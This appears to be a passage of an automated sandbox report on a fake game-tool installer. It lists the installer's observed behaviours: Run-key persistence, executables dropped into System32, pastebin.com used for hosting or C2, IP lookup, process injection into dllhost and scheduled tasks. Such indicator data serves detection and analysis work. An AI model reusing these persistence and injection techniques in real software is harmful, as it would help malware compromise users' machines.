| Set value (str) | \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" | C:\Program Files\Node64.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_230f9025c8623e5d\usbport.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_230f9025c8623e5d\usbport.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\$Node2Json.exe | C:\Program Files\Node64.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_71e43a6eaa912e56\input.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node32.exe | C:\Program Files\Node64.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_e89200d3ede2154e\hdaudbus.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_71e43a6eaa912e56\input.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | \??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_e89200d3ede2154e\hdaudbus.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File created | C:\Windows\System32\$Node32.exe | C:\Program Files\Node64.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node2Json.exe | C:\Program Files\Node64.exe | N/A |
| File opened for modification | C:\Windows\System32\$Node3Json.exe | C:\Program Files\Node64.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF | C:\Windows\System32\DxDiag.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\System32\$Node3Json.exe | C:\Program Files\Node64.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 908 set thread context of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WinRAR\Temp\Updater.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe | N/A |
| File created | C:\Program Files\Node64.exe | C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\WinRAR\Temp\Updater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\System32\$Node32.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\System32\DxDiag.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\DxDiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\System32\DxDiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\System32\DxDiag.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\System32\DxDiag.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\System32\DxDiag.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\System32\mousocoreworker.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\System32\mousocoreworker.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={48F3852C-80C8-4EFC-8BC2-B3FC8C353B59}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 02 Dec 2024 16:13:27 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1733156003" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1 | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1263212995-3575756360-1418101905-1000\{968C83BC-C5A3-4A77-99E9-EF552CB3CFFA} | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B} | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\System32\\dxdiagn.dll" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1 | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1263212995-3575756360-1418101905-1000\{B3E44E69-972B-40A0-B622-9184BC2F8E1C} | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7} | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class" | C:\Windows\System32\DxDiag.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Windows\System32\DxDiag.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
